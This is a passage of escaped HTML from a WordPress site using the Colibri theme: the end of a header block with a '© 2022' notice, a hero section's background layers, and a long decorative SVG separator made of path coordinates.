class=\"h-column h-column-container d-flex h-col-none style-258-outer style-local-22-h16-outer\">\n                                    <div data-colibri-id=\"22-h16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-258 style-local-22-h16 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"22-h17\" class=\"h-text h-text-component style-259 style-local-22-h17 position-relative h-element\">\n                                          <!---->\n                                          <!---->\n                                          <div class=\"\">\n                                            <p>© 2022</p>\n                                          </div>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                          </div>\n                        </div>\n                        <div id=\"offcanvas-overlay-22-h9\" class=\"offscreen-overlay style-251-offscreenOverlay style-local-22-h9-offscreenOverlay\"></div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-id=\"22-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-212 style-local-22-h24 position-relative\">\n    <div class=\"background-wrapper\">\n      <div class=\"background-layer background-layer-media-container-lg\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n      <div class=\"background-layer background-layer-media-container-md\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n      <div class=\"background-layer background-layer-media-container\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n    </div>\n    <div class=\"h-separator\" style=\"height: 165px; top: 0px;\">\n      <svg style=\"fill:white;\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.14\" preserveAspectRatio=\"xMidYMax slice\">\n        <path d=\"M358.2,118.5c2.7.7,4.2.9,1.4,1.6,6.4.2,4.5-.4,6.4-.6-6.7-.4,5.4-.8,1.4-1.6C361,117.8,366.8,119.1,358.2,118.5Z\"></path>\n        <path d=\"M339.8,118.1c-3.6-.4,0-.6-6.3-.8C334.1,117.6,335.1,118,339.8,118.1Z\"></path>\n        <path d=\"M360.9,118.5c1-.3,4.5-.5-.8-.9C361.2,117.9,356.6,118.2,360.9,118.5Z\"></path>\n        <path d=\"M406.1,117.7c.9.2-1.1.5,1.9.6C410.1,118.2,412.5,117.9,406.1,117.7Z\"></path>\n        <path d=\"M374.9,117c2-.1,1.8-.7-3.4-.7C373,116.5,372.5,116.9,374.9,117Z\"></path>\n        <path d=\"M402.9,115.6c.6-.2,3.2-.2,2.2-.6C401.5,114.8,400,115.4,402.9,115.6Z\"></path>\n        <path d=\"M226.2,110.6c2-.2,1.7.7,4.8.8-1.5-.5,1.7-.5.5-1C228.2,110.4,222.5,110.2,226.2,110.6Z\"></path>\n        <path d=\"M404.4,114.2c-.2.1-1.4.1-2.6.2a8.94,8.94,0,0,0,3.2.5C405.3,114.7,406.5,114.4,404.4,114.2Z\"></path>\n        <path d=\"M332.9,111.9a66.47,66.47,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C339.1,111.5,336.8,112,332.9,111.9Z\"></path>\n        <path d=\"M393.1,112.4c-.9.3,2.5.4,4.7.5C399.4,112.6,398.4,112.3,393.1,112.4Z\"></path>\n        <path d=\"M340.6,111.1c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C339.4,111.3,344.9,111.3,340.6,111.1Z\"></path>\n        <path d=\"M313.3,110.2c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C309.5,110.3,312.9,110.4,313.3,110.2Z\"></path>\n        <path d=\"M317.1,108.2c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C309.8,107.9,313.6,108.4,317.1,108.2Z\"></path>\n        <path d=\"M326.8,108.1c-2.6.1-6.4,0-6.7.3C324.7,108.5,326.8,108.4,326.8,108.1Z\"></path>\n        <path d=\"M540.9,113c4,.1,3.8-.2,3.7-.5C540.1,112.4,540.3,112.7,540.9,113Z\"></path>\n        <path d=\"M320.1,106.8a37.78,37.78,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C320.3,107.4,318.6,107.3,320.1,106.8Z\"></path>\n        <path d=\"M361,107.5c-.4.3-7.1.6.8.9C359.5,108,365.2,107.8,361,107.5Z\"></path>\n        <path d=\"M368.1,104.5c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C371.8,104.4,366.8,104.2,368.1,104.5Z\"></path>\n        <path d=\"M354.9,102.2c-2.7-.1-3,.1-5.6,0,5.3.5-1.8,1.5,4.3,1.7.2-1.1,1.6-1.1,3.6-2.2C350.1,101.5,349.6,101.6,354.9,102.2Z\"></path>\n        <path d=\"M359,100.5c-5.3,0-4.4.6-6.1,1C359.4,101.6,357.9,100.9,359,100.5Z\"></path>\n        <path d=\"M87.7,93.8c-5.6-.2-1.5,1.4-.4,1.1C87.3,94.2,86.8,94.2,87.7,93.8Z\"></path>\n        <path d=\"M388.4,99.2a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C389.7,100.1,391.9,99.5,388.4,99.2Z\"></path>\n        <path d=\"M308,97.8c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C310.9,97.7,311.5,98,308,97.8Z\"></path>\n        <path d=\"M475.7,100.5c0,.2-3.8.8,2.2.9C476.8,101.2,478.9,100.7,475.7,100.5Z\"></path>\n        <path d=\"M369.5,98.2c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C378.9,98.6,369,97.9,369.5,98.2Z\"></path>\n        <path d=\"M112,92.9c0-.4,1.8-.7,1.8-1.2C110,91.7,108,92.8,112,92.9Z\"></path>\n        <path d=\"M465,99.5c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C462.7,99.7,465.9,99.8,465,99.5Z\"></path>\n        <path d=\"M382.4,97.1c-.5.3-2.3.7,1,1.1C383.6,98.1,386.1,97.5,382.4,97.1Z\"></path>\n        <path d=\"M375,96.6c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1A24.16,24.16,0,0,0,375,96.6Z\"></path>\n        <path d=\"M360.5,97.5c.2-.4,2.6-1-1.3-1.4C359.1,96.6,355.4,97,360.5,97.5Z\"></path>\n        <path d=\"M137.1,91.4c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C145.1,91.6,139.2,91.1,137.1,91.4Z\"></path>\n        <path d=\"M119,89.8c2.2.2,4.2.6,2,.7a26.11,26.11,0,0,1,2.8.1c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5C122.6,90,119.9,89.5,119,89.8Z\"></path>\n        <path d=\"M305.8,93.8c-.6.5,7.3.4,10,.3C312.4,93.7,308.9,94.1,305.8,93.8Z\"></path>\n        <path d=\"M383.2,94.8c4.5-.5,2,.4,6,.5.2-.5-1.5-.8-7.8-.9C381.8,94.5,381.2,94.8,383.2,94.8Z\"></path>\n        <path d=\"M312.9,90.7c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C309.3,91.2,313.2,91.2,312.9,90.7Z\"></path>\n        <path d=\"M477.8,95.1c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C476.5,95.3,476.8,95.2,477.8,95.1Z\"></path>\n        <path d=\"M320.4,91.3c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C320.8,91.7,324.3,91.5,320.4,91.3Z\"></path>\n        <path d=\"M122.5,85.9c.2.3-4.3.8.9,1C122.6,86.6,126.8,86.2,122.5,85.9Z\"></path>\n        <path d=\"M311.1,90.3c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C303.4,89.8,308.8,89.9,311.1,90.3Z\"></path>\n        <path d=\"M163.4,85.1c4.8.2,7.4-.4,2.2-.6C163.8,84.6,165.2,85,163.4,85.1Z\"></path>\n        <path d=\"M422,90c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C418.8,90.3,425.8,90.5,422,90Z\"></path>\n        <path d=\"M315,86.9c-5.7-.1-11.4.9-5.9,1.2-1.1-.3.2-.4,4-.2C307.8,87.2,319.7,87.3,315,86.9Z\"></path>\n        <path d=\"M321.2,86c3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.4.2-2.5.7,2.2.9,1.4-.6,2,.4,7.2.3C326.4,86.9,326.5,85.9,321.2,86Z\"></path>\n        <path d=\"M352.5,86.8c-1.5-.7-5.1,0-8.8-.5,1.6.5-.5.8,3.6,1C346,86.8,349.2,86.5,352.5,86.8Z\"></path>\n        <path d=\"M500.2,90.5c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A25,25,0,0,1,500.2,90.5Z\"></path>\n        <path d=\"M359,86.3c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C362.5,85.8,360.3,86,359,86.3Z\"></path>\n        <path d=\"M474.6,88.3c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A37.42,37.42,0,0,0,474.6,88.3Z\"></path>\n        <path d=\"M147.8,78.4c1.8-.3-4.9-.2-4.5-.4,6.3-.1-3.5-.6,2.3-.6-2.7,0-3.2-.2-5.8-.2.5.9,3.7,1.5-1.1,1.9,4.5.4,2,1.2,7,1.6,0-.5,1.5-1.1-1.6-1.8,1.4-.2,6.1.4,5.5-.1C146.3,78.7,142.1,78,147.8,78.4Z\"></path>\n        <path d=\"M317,84.4c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C315.3,84.2,312.8,84.2,317,84.4Z\"></path>\n        <path d=\"M265.7,81.4c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C267.7,82.1,268.8,81.5,265.7,81.4Z\"></path>\n        <path d=\"M182.7,80.2c-4.1-.3-1.3-1-6.7-1.2C177.3,79.3,176.1,79.8,182.7,80.2Z\"></path>\n        <path d=\"M238.5,80.4c1.8.3-3.8.4.6.7-1-.4,3.6-.2,3.8-.5C240.9,80.6,239.7,80.5,238.5,80.4Z\"></path>\n        <path d=\"M335.4,83.2c4.5.2,7.8-.1,3.9-.4C338.9,83,333.8,82.8,335.4,83.2Z\"></path>\n        <path d=\"M118,77.6a10.17,10.17,0,0,1-2.7,0q0,.45,3.3.6C116.8,78,122.4,77.9,118,77.6Z\"></path>\n        <path d=\"M126.7,78c3.7.1,4.6.4,8.8.5-.2-.3-1.8-.6-4.8-.8C130.7,78,126,77.8,126.7,78Z\"></path>\n        <path d=\"M308.8,81.4c-.8.3-1,.4,2,.7-1.6-.4,3.5-.1,3.9-.3C310.3,81.8,311.1,81.5,308.8,81.4Z\"></path>\n        <path d=\"M246.7,80.3c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C253.5,80.5,245.4,80,246.7,80.3Z\"></path>\n        <path d=\"M173.5,77.7c5.8.1,1,.9,5.1,1.1,1.8-.6,3.6-1.6-3.4-2.3-4.1.2,3.1.7,2.4,1.1A37.48,37.48,0,0,0,173.5,77.7Z\"></path>\n        <path d=\"M315.9,81.5c0-.3,2.2-.4,2.1-.7C314.1,80.7,312.8,81.3,315.9,81.5Z\"></path>\n        <path d=\"M351.3,82.2c.3-.4,1.3-.5-3.4-.7C348.9,81.7,346.2,82.2,351.3,82.2Z\"></path>\n        <path d=\"M220.8,79.3c.6-.2,3.2-.2,2.2-.6C219.9,78.7,215.9,79.1,220.8,79.3Z\"></path>\n        <path d=\"M152.4,77.3c1.7-.3,1.1-.6-3.5-.8C149,76.8,150,77.1,152.4,77.3Z\"></path>\n        <path d=\"M347.3,79.3c-5-.2-2.6.8-.6.9C349,79.9,345.9,79.7,347.3,79.3Z\"></path>\n        <path d=\"M139.5,75.2c3.9,0,3.8.2,7.2.3C147.6,75.1,139.3,74.8,139.5,75.2Z\"></path>\n        <path d=\"M172.1,74.5c2.1.1,2.6.2,4.5.3-2.4-.6-2-.8-3.9-1.3C172.9,73.9,170.7,74,172.1,74.5Z\"></path>\n        <path d=\"M130.5,72.9c1,.3,3.1.5,4.8.8C135.1,73.3,135.5,72.9,130.5,72.9Z\"></path>\n        <path d=\"M390.3,79.2c-.3-.4,3.6-.4,5-.7C389,78.2,386.2,78.8,390.3,79.2Z\"></path>\n        <path d=\"M218.2,74.8c4.3.1,5.6-.7,1.9-1C221.2,74.2,214.3,74.4,218.2,74.8Z\"></path>\n        <path d=\"M177.5,72.7c.3.3.5.6.8.9C183.5,73.7,183.6,72.9,177.5,72.7Z\"></path>\n        <path d=\"M149.2,72.1c-3.4-.1-3.5-.4-6.1-.6,1.5.6,1.7,1.2,8.3,1.5C152,72.6,143.3,72.2,149.2,72.1Z\"></path>\n        <path d=\"M128,71.6c3.6-.2-3.4-.8.5-1-3.8,0-3.1-.3-5.9-.4C125.5,70.9,122.7,71.1,128,71.6Z\"></path>\n        <path d=\"M146.2,70.3c-4.5-.1-2.4.4-5.2.4,3.4.1,1.8.5,4.7.7a11.09,11.09,0,0,1,2.7,0c-3.1-.6,1.1,0,2.4-.4C146.9,70.6,144,70.8,146.2,70.3Z\"></path>\n        <path d=\"M431.6,77.4a4.41,4.41,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C430.2,77.2,428,77.6,431.6,77.4Z\"></path>\n        <path d=\"M407.6,76.8c.4-.3,4.1-.4,3.5-.8C407.2,76,405.6,76.7,407.6,76.8Z\"></path>\n        <path d=\"M315.5,74.8c.8-.4-3.7-.6-.7-.8C310.2,73.7,311.1,74.8,315.5,74.8Z\"></path>\n        <path d=\"M229.6,72c1.7.1,4,.1,4.4.2s0,.3,1.7.4c1.7-.3-1.2-.6-3.6-1C231.6,71.7,227.7,71.6,229.6,72Z\"></path>\n        <path d=\"M144.8,70.2c-2.6-.4,5.6-.3.8-.6-1.3.1-2.6.2-4,.2.2-.2-.7-.4-3.2-.5-.4.3,3.5.5.6.7A53.44,53.44,0,0,1,144.8,70.2Z\"></path>\n        <path d=\"M421.4,75.2c-4.3-.1-5.3.1-8.2.1a10.34,10.34,0,0,0,3.3.6C416.9,75.6,422.5,75.7,421.4,75.2Z\"></path>\n        <path d=\"M380.2,74c-.8.3-1.1,1,5.2,1.2C383.3,74.9,382.7,74.4,380.2,74Z\"></path>\n        <path d=\"M372.6,75c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C370.8,74.9,369.7,74.7,372.6,75Z\"></path>\n        <path d=\"M441.1,75.5a45.38,45.38,0,0,0,4.9.9C448.4,76.2,447.3,75.5,441.1,75.5Z\"></path>\n        <path d=\"M152,69c-1.1.2-5.6,0-3.8.5,2.1,0,5.3.2,5.6,0-1.1-.1-2.8-.1-2.9-.2C150.6,69.2,156.8,69.2,152,69Z\"></path>\n        <path d=\"M366.4,74.2c-1-.3,5.6-.5-2-.7C365.4,73.7,363.2,74.1,366.4,74.2Z\"></path>\n        <path d=\"M126.5,68.3c.3.1,0,.3,1.7.4.2-.3,4.1-.2,5.3-.3C130.2,68.3,128,68.3,126.5,68.3Z\"></path>\n        <path d=\"M405.8,74.7c2.5-.2,5-.1,2.3-.5C404.5,74.1,402.6,74.6,405.8,74.7Z\"></path>\n        <path d=\"M154.1,68.3c-.2.2-5.2,0-5.4.2,5.2,0,2.6.5,7.4.5C155.2,68.8,157.3,68.4,154.1,68.3Z\"></path>\n        <path d=\"M188.2,69.1c-7.4-.3-2.7.8.4.4C185,69.4,187.8,69.1,188.2,69.1Z\"></path>\n        <path d=\"M450,74.5c1,.4,2.4.7,6.4.9A26.64,26.64,0,0,0,450,74.5Z\"></path>\n        <path d=\"M142.7,67.8c.6.2,12.2.6,7.1.2,0,.1-.1.1-1.3.1-.3-.1,0-.3-1.7-.4C146.8,67.9,142.9,67.7,142.7,67.8Z\"></path>\n        <path d=\"M184.6,68.1c-6.5,0-5.1.1-8.7-.4-.3.3-.2.4-3.7.6,4.4.2,5.8.1,10.1.4,1.5-.1,1.4-.2-.4-.4C183.6,68.3,185.2,68.3,184.6,68.1Z\"></path>\n        <path d=\"M153.3,67.3c-4.5-.2-5.7,0-6.8.2,2.5,0,4.4.1,5.8.2C151.7,67.5,153.6,67.5,153.3,67.3Z\"></path>\n        <path d=\"M287.9,70.2c-3-.2-5.8-.4-8.8-.5C278.3,70,286.9,70.4,287.9,70.2Z\"></path>\n        <path d=\"M409.8,73c.8-.3,1.6-.6-2.1-.8C409.2,72.6,404.2,72.7,409.8,73Z\"></path>\n        <path d=\"M47.3,63.6c-.3.3-3.9.2-3.7.6C46.9,64.2,51,63.9,47.3,63.6Z\"></path>\n        <path d=\"M126.3,64.9a22.4,22.4,0,0,0,4.8.8c-.1-.1,2.4,0,2.7-.2C129.7,65.4,130.9,65,126.3,64.9Z\"></path>\n        <path d=\"M45.5,63.1a23.75,23.75,0,0,1,2.8.1c-1-.4,3-.6-3.5-.8-.2.4,3.1.6-.8.6C44.8,63,45.6,63,45.5,63.1Z\"></path>\n        <path d=\"M337.1,69.4c-2.2-.5,4.5-.2,5.2-.4C338.5,68.4,330.4,69.2,337.1,69.4Z\"></path>\n        <path d=\"M267.4,65.9a10.66,10.66,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3C264.3,66.9,272.2,66.3,267.4,65.9Z\"></path>\n        <path d=\"M49.3,61.1c-5-.2-1.1.5-5.2.4,2.2.2,6.4.2,6.1.6-3.8,0-3-.3-5.9-.4.8.6,7.8.6,10.1.3C50,61.9,49.2,61.6,49.3,61.1Z\"></path>\n        <path d=\"M411.5,70.2c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C408.2,69.8,409.3,70,411.5,70.2Z\"></path>\n        <path d=\"M127.1,62.8c-2,.1-8.6.3-3.6.7C121.5,63,131.3,63.1,127.1,62.8Z\"></path>\n        <path d=\"M242.9,64.9c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C245.7,65.1,247.4,65.1,242.9,64.9Z\"></path>\n        <path d=\"M254.7,65.6c2,.1,2.5.2,4.4.3-2.4-.5-.6-.7.4-1.1C255,64.9,253.7,65.1,254.7,65.6Z\"></path>\n        <path d=\"M408.6,68.5c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C413.4,68.8,411.6,68.6,408.6,68.5Z\"></path>\n        <path d=\"M312.4,66.5c.8-.4-2.8-.5-4.9-.8C304.3,66,309.5,66.3,312.4,66.5Z\"></path>\n        <path d=\"M214.1,63.7a54.5,54.5,0,0,0-7,0c2.3.1,1.1.3,3.1.4.1-.1-.5-.3,1.1-.3C213.1,63.9,214.4,64,214.1,63.7Z\"></path>\n        <path d=\"M345.5,66.3c-.6-.3-4.5.8.7.8C349.2,66.9,344.7,66.6,345.5,66.3Z\"></path>\n        <path d=\"M255.4,64.9c2.3-.2-.1-1-3.4-.7C256.5,64.4,249,64.7,255.4,64.9Z\"></path>\n        <path d=\"M365.6,66.9c-4,.1-13.3-.4-14-.1C353.2,66.8,366.6,67.6,365.6,66.9Z\"></path>\n        <path d=\"M149.8,61.8c-.4.3,2.2.5,4.7.7C154.5,62.1,154.2,61.8,149.8,61.8Z\"></path>\n        <path d=\"M106.4,61.3c-2.3-.4,5.9-.4.7-.7.3.2-.9.2-2.7,0C105.4,60.8,103.3,61.2,106.4,61.3Z\"></path>\n        <path d=\"M335.9,66.4c4.3.2,5.7-.3,2.3-.5C337.8,66.1,335.4,66.1,335.9,66.4Z\"></path>\n        <path d=\"M65.7,59.3c1.9.6-.8.7,3.7,1.1C69.3,60,68.7,59.6,65.7,59.3Z\"></path>\n        <path d=\"M56.2,59.5c4.4.1,4.7.5,7.6.7C65.4,59.8,58.3,59.3,56.2,59.5Z\"></path>\n        <path d=\"M59.6,57.1c-2.1,0-5.3-.2-5.6,0,6.7.2,3.9.9,8.1,1.3,1-.4,6.1.4,1.8.5,1.9,0,3.1.1,4.3.2,2.3-.1-1.6-.4-.7-.8C60.9,58.1,63.4,57.4,59.6,57.1Z\"></path>\n        <path d=\"M38.7,57c2.2.5.4,1.2,6.8,1.5C39.5,57.8,46.5,57.5,38.7,57Z\"></path>\n        <path d=\"M116.7,58.8c4.6.5,2.4,1,6.6,1.2-2.1-.5,1.9-.4,2.2-.7C120.5,59.3,121.1,58.9,116.7,58.8Z\"></path>\n        <path d=\"M105.5,58.7c.1.4,5.3.5,7.6.7A53.68,53.68,0,0,0,105.5,58.7Z\"></path>\n        <path d=\"M269.6,62c2.2.4-7,.5.7.8C268.8,62.5,274,62.3,269.6,62Z\"></path>\n        <path d=\"M151.7,59.2a15.43,15.43,0,0,0,4.9.8C153.3,59.5,158.6,59.4,151.7,59.2Z\"></path>\n        <path d=\"M332.9,62.9c.4.3,1.3.5,3.4.7,1.6-.2-.4-.2.9-.5C335.3,63.1,334,63,332.9,62.9Z\"></path>\n        <path d=\"M253.4,61c2,0,3.2.1,4.4.2,0-.1.2-.3,2.6-.2a9.4,9.4,0,0,0-3.2-.5A19.4,19.4,0,0,1,253.4,61Z\"></path>\n        <path d=\"M104.2,57.2a34.16,34.16,0,0,0-6.7.3C102.2,57.7,104.2,57.5,104.2,57.2Z\"></path>\n        <path d=\"M33.6,54.3c3.4.5-.7,1,3.9,1.3C35.6,55,41.5,54.6,33.6,54.3Z\"></path>\n        <path d=\"M140.1,57c7.7.1,4.9-.6.5-1C142,56.5,139.8,56.6,140.1,57Z\"></path>\n        <path d=\"M344,61.3c1.8-.1,8.3-.4,2.1-.7,1.1.3-.2.4-4,.2C342.5,61,342,61.2,344,61.3Z\"></path>\n        <path d=\"M88.8,53.9c2.3.5-2.1,1.3,2.6,1.4C89.3,54.7,94.7,54.3,88.8,53.9Z\"></path>\n        <path d=\"M193.6,56.3a38.23,38.23,0,0,0,6.3.8C199.3,56.7,198.3,56.4,193.6,56.3Z\"></path>\n        <path d=\"M95.7,53.9a9.77,9.77,0,0,0-3.5-.8C90.8,53.1,92.2,53.7,95.7,53.9Z\"></path>\n        <path d=\"M343.9,58.2c-3.5-.1-6.8-.1-8.6-.3,1.9.3,6.3.5,9,.7C344.2,58.5,344.1,58.3,343.9,58.2Z\"></path>\n        <path d=\"M200.4,54.5c-1.8.1-2,.7,2.1.8C199,54.9,204.1,54.8,200.4,54.5Z\"></path>\n        <path d=\"M306.6,56.8c.2.3,1.2.6,3.5.8C309.6,57.3,310.7,56.9,306.6,56.8Z\"></path>\n        <path d=\"M298.8,55.8c.9.5-4.5,0-7,0-.6.2-2.7.3-3.8.5,4.2-.2,14.1.2,16.5-.2C302.1,56,300.1,55.9,298.8,55.8Z\"></path>\n        <path d=\"M204.6,53.1c-5,0-.6-.7-6.2-.7C198.2,52.7,202.3,53.3,204.6,53.1Z\"></path>\n        <path d=\"M110.7,50.4a52.3,52.3,0,0,0-5.6,0c0,.3.2.5,3.3.6C107.5,50.6,110.1,50.6,110.7,50.4Z\"></path>\n        <path d=\"M308,55.2c-1.5-.6-7.4-1.1-1-1.1-4.2-.3-11.5-.3-14.5-.7l.2.2c4.2.2,8,.5,10.4.8C297.7,54.4,304.6,55,308,55.2Z\"></path>\n        <path d=\"M265.3,54.1c4.3.2,5.7-.3,2.3-.5C267.3,53.8,263.8,53.7,265.3,54.1Z\"></path>\n        <path d=\"M29.6,48.2c.9.2-1.2.5,1.9.6C32.3,48.6,36.7,48.4,29.6,48.2Z\"></path>\n        <path d=\"M333.9,54.7c-2.8.1-.5.9,3.6,1C337.4,55.1,338.3,55,333.9,54.7Z\"></path>\n        <path d=\"M113.1,49.9c-.4.3,1.7.5,6,.6C120.5,50.1,115,50.1,113.1,49.9Z\"></path>\n        <path d=\"M345.4,55c-1.9-.1-2.8-.2-5.8-.2.2.2.3.4.5.6C343.7,55.4,345.4,55.3,345.4,55Z\"></path>\n        <path d=\"M134.1,50.2c3,.1.8.5,4.4.3.3.1,0,.3,1.7.4C144.3,50.7,135.5,50,134.1,50.2Z\"></path>\n        <path d=\"M343.3,54.2c-4.7-.2-.8.3-5.5.1-.4-.2.2-.4-1.8-.5.2.2.3.4.5.6,2.1.1,3.7.2,5.9.4C340.9,54.4,344.1,54.5,343.3,54.2Z\"></path>\n        <path d=\"M281.2,53.1c-2.1-.2-.1-.7-4.8-.8C276.7,52.7,276.8,53.1,281.2,53.1Z\"></path>\n        <path d=\"M266.4,52.2c-2.5,0-4.4-.1-5.8-.2,1.8.2,4.6,1,7.6.7C266.1,52.6,266.7,52.3,266.4,52.2Z\"></path>\n        <path d=\"M165.1,49.1c-.9,0-1.7,0-1.3.1,3.8.2.9.7.8.9,4.8,0,3.9-.4,6.4-.6-5.2-.1-3.4.1-3-.3C166.9,49.2,166,49.1,165.1,49.1Z\"></path>\n        <path d=\"M356.2,53.1c-1.9-.1-2.8-.2-5.8-.2q0,.45,3.3.6C353.5,53.2,357.5,53.4,356.2,53.1Z\"></path>\n        <path d=\"M280.7,51.1c-3.1,0-4.9.1-5.3.3,2,0,3.2.1,4.4.2C278.3,51.2,281.5,51.3,280.7,51.1Z\"></path>\n        <path d=\"M304.1,50.8c-3.5,0-5.6.1-8.2.1,2.1.1,1.5.3,1.8.5,2,.2,5.3.2,7.3.4l-.4-.4a36.81,36.81,0,0,1-4.2-.1l-.2-.2C302.8,51.3,305.1,51.2,304.1,50.8Z\"></path>\n        <path d=\"M352.3,51.9c-4.7-.1-5.3.2-6.5.5,2.6,0,3.2.2,5.8.2C350.5,52.2,349.2,52.1,352.3,51.9Z\"></path>\n        <path d=\"M289.7,50.2c-4.5,0-2.3-.4-5.9-.5C282.9,50.1,288.5,50.6,289.7,50.2Z\"></path>\n        <path d=\"M362.9,51.3c-4.3,0-4.3-.3-8.6-.3C354.5,51.3,363.5,51.6,362.9,51.3Z\"></path>\n        <path d=\"M344.4,50.7c3.4-.3-.7-1.2,4.4-1.3,0-.3-2.5-.4-4.6-.5C347.9,49.5,339.4,50.2,344.4,50.7Z\"></path>\n        <path d=\"M363.6,50.5c-4,.1-9.2.1-2.4.4.1.1.3.1,1.5.1C361.3,50.7,364.5,50.8,363.6,50.5Z\"></path>\n        <path d=\"M356.6,48.8c.3.3-2.2.3-.8.6,3.5.1,6.9.2,6.9-.1-1.7-.1-4-.1-4.4-.2A4.48,4.48,0,0,0,356.6,48.8Z\"></path>\n        <path d=\"M341.9,48c.8.2.9.5,4.6.5C349,48.4,345.8,48.1,341.9,48Z\"></path>\n        <path d=\"M349.2,48.3c1.9,0,3.8.1,5.7.1-.2-.2-.3-.4-.5-.6C349.1,47.7,348.3,48,349.2,48.3Z\"></path>\n        <path d=\"M38.1,40.6c-4.5-.1-7.1.3-2.3.5C34.4,40.7,39.5,40.9,38.1,40.6Z\"></path>\n        <path d=\"M294.9,46.7c6.2.2,3.3-.4,3.5-.8C291.1,45.8,297.4,46.3,294.9,46.7Z\"></path>\n        <path d=\"M354.2,47.7c1.4-.2,4.4-.3,5.1-.5C355.5,47.1,350.1,47.4,354.2,47.7Z\"></path>\n        <path d=\"M259.6,44.5c5.7-.1,11.3.5,15.6.4-4.3-.2,1.2-.2-.4-.4-4.4-.1-8.4.2-11.3-.3C264.2,44.4,258.1,44.1,259.6,44.5Z\"></path>\n        <path d=\"M376.3,46c-3.7,0,.8-.6-4.6-.5,1.9.4,1.2.4-2.3.5a32.29,32.29,0,0,0-4.5-.4c2.3.5,6.6.7,3.7,1.1,1.7.1,3.9.2,7.2.3,1.1-.4-5.5-.3-4.7-.7A34.73,34.73,0,0,0,376.3,46Z\"></path>\n        <path d=\"M299.8,44.3c-1.1.1-3.1.7,2,.7C298.8,44.6,303.5,44.6,299.8,44.3Z\"></path>\n        <path d=\"M278.3,43.6c6.4,0,4.8.5,8.9.6-.9-.7,4.9-1-1.3-1.4.6.4-2.1.4-.6.9C283.3,43.6,277.9,43.3,278.3,43.6Z\"></path>\n        <path d=\"M337.4,44.4c-1.1.1-3.1.9,2.2.9C335.9,44.9,341.5,44.7,337.4,44.4Z\"></path>\n        <path d=\"M240.3,43.1c6.1.2,6.3-.2,8-.4C242.3,42.5,242,42.8,240.3,43.1Z\"></path>\n        <path d=\"M4.7,37.3c-.1-.3-.5-.7-3.5-.8C-.4,36.6.4,37.2,4.7,37.3Z\"></path>\n        <path 